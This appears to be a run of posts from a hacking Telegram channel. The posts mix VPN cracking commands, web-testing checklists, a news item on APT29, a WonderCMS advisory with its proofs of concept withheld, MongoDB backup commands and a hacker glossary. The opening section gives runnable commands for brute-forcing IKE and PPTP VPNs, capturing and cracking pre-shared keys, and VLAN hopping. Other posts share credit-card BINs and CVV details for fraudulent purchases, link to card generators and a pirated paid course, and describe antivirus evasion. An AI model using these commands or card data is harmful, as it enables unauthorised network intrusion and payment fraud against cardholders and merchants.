▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VPN HACKING METHODES & MORE

# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip

- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt

# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

### Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP

Use psk-crack to crack the PSK hash

psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key


# PPTP Hacking Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:

nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack

thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst


# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh`

enjoy❤️👍🏻
✅git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The right steps for Information Gathering

1) Manually explore the site

2) Spider/crawl for missed or hidden content

3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store

4) Check the caches of major search engines for publicly accessible sites

5) Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)

6) Perform Web Application Fingerprinting

7) Identify technologies used

8) Identify user roles

9) Identify application entry points

10) Identify client-side code

11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)

12) Identify co-hosted and related applications

13) Identify all hostnames and ports

14) Identify third-party hosted content

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Steps a good Configuration Management :

1) Check for commonly used application and administrative URLs

2) Check for old, backup and unreferenced files

3) Check HTTP methods supported and Cross Site Tracing (XST)

4) Test file extensions handling

5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)

6) Test for policies (e.g. Flash, Silverlight, robots)

7) Test for non-production data in live environment, and vice-versa

8) Check for sensitive data in client-side code (e.g. API keys, credentials)

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

✅x3 Bins For Xbox Live

Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00

Date: 22/07

CVV : 706
IP : USA 🇺🇸

only verified by Us

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Britain, the United States and Canada say that Russian intelligence agencies are trying to steal the new crown vaccine research results
#News

> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.

>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.

> The UK’s National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.

> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.

> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.

> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."


#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Paid guide LinuxPrivelegeEscalation Full by cybermentor:

https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑INTERESTING NEW BUG- DESCRIPTION :

> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use.It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."

> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files
with a malicious client side script as filename. It will be executed in
the browser of a user if he visits the manipulated URL.

2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.

3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.


🦑Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

2. Directory Traversal (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

3. Upload of arbitrary files (Authenticated user)

[ PoC has been removed as no patch is available and the vendor is unresponsive ]

🦑Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 has been tested, which was the latest version
available at the time of the test. Previous versions may also be affected.

On 18-05-2020, the vendor released a newer version 3.1.0. However, the latest
version are still vulnerable to the above vulnerabilities.

source deeepweb
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MongoDB database backup and recovery

//The entire database is backed up to the specified directory
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak

//Restore the entire library
mongodump -h dbhost -u user -p pass -d dbdirectory
mongorestore -h 192.168.0.2 -u “root” -p “123” D:\bak
—————————————— —————————————
//Only backup the table of mytable to the specified directory
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable

//Restore a single table
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
———————————————————————
// Can also be used mongoexport backs up a single table, but the file
mongoexport -h dbhost -d dbname -c collectionname -o dbdirectoryfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak

//Use mongoimport to restore the specified file to the library
mongoimport -h dbhost -d dbname -c collectionname -file
mongoimport -h 192.168.0.2 -d mydatabase -c mytable -file E:\bak\mytable.bak



▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share ❤️👍🏻

T.me/UndercodeSecurity

🦑Some working New bins :


1) BIN PUBG MOBILE

401893xxxxxxxxxx

CCV/FECHA: RND (Random)

IP: USA

🏄‍♂️Best Cc generators : https://t.me/UNDERCODEHACKING/2150

2) New BIN Facebook Ads 25$

BIN : https://www.file4.net/f-1lUf

IP : USA

Zip Code : 57108

2) BIN GOOGLE PLAY

BIN: https://www.file4.net/f-1lUf
FECHA: 06/24. (By all bin)

CVV: Generado

IP USA 🇺🇸

🏄‍♂️Best Cc generators : https://t.me/UNDERCODEHACKING/2150


verified✅

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME IMPORTANT TERMS BY UNDERCODE :

1) Weak password

Refers to the passwords that are not strong enough and easy to guess. Passwords (passwords) like 123456, abc123, abcdefg, and woainixiaofeng are common intrusion methods for hackers. About 20 of 100 passwords are such weak passwords.

2) shell

Refers to a command execution environment. For example, when we press the "windows key + R" on the keyboard, the "Run" dialog box appears. Entering "cmd" in it will present a black window where you can run commands. This window is basically I have used it on the Internet or watched it in a hacker movie. This is the Windows Shell execution environment. In the past, when there was no mouse and only a keyboard, all computer operations were completed by this!

3) WebShell

WebShell is a command environment that exists in the form of asp, php, jsp and other web files, and it can also be called a web page backdoor. After hackers invade a website, they will usually mix these asp or php backdoor files with the normal webpage files in the web directory of the website server, and they will usually hide deeper, because they cannot be found by the administrator, and the website cannot be obtained if they are deleted. Control it. A website is linked to the webshell backdoor, basically you can do whatever you want, you can modify any part of the website or delete it. The website transactions between hackers are carried out by webshell. For example, how much money do I spend to buy the webshell permission of this website, and the attacker is responsible for finding a way to put the webshell backdoor in this website, so everyone should understand.

4) injection

With the website environment developed by the B/S structure, basically all websites need a database. The user can submit a piece of database query code and obtain some data he wants to know according to the results returned by the program. This is normal. However, if the query statement is modified into malicious code, it is destructive. This is The so-called SQL injection, the most offensive web page vulnerability, is the culprit for countless enterprise sites being invaded.

5) Injection point

Refers to the place where SQL injection can be performed, generally a web page address with parameters. Depending on the account permissions of the injection point database, the permissions you get are also different.


6) Intranet

Generally speaking, it is a local area network, such as Internet cafes, campus networks, and company intranets. If the IP address is within the following three ranges, it means that we are in the intranet: 10.0.0.0-10.255.255.255, 172.16.0.0-172.31.255.255, 192.168.0.0-192.168.255.255.


7) Extranet

Connect directly to the internet (Internet), allowing any computer to access each other, and the external network needs to be connected to broadband to achieve.

8) Kill

It is to change the program through operations such as packing, encrypting, modifying feature codes, adding flower instructions, etc., so that it can escape the detection and killing of anti-virus software. The Trojans generated by the remote control we mentioned earlier are often found by anti-virus software and cannot achieve the effect of controlling the computer. Therefore, anti-virus technology must be used to avoid scanning by anti-virus software, so that anti-virus software mistakes it for safe software and does not proceed. Intercept.

9) Flower instruction

It is just a few assembly instructions to make some jumps in the assembly statement, so that the anti-virus software cannot normally judge the structure of the virus file. The popular point is that "antivirus software searches for viruses in order from head to toe. If we reverse the head and foot of the virus, the antivirus software will not find the virus.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁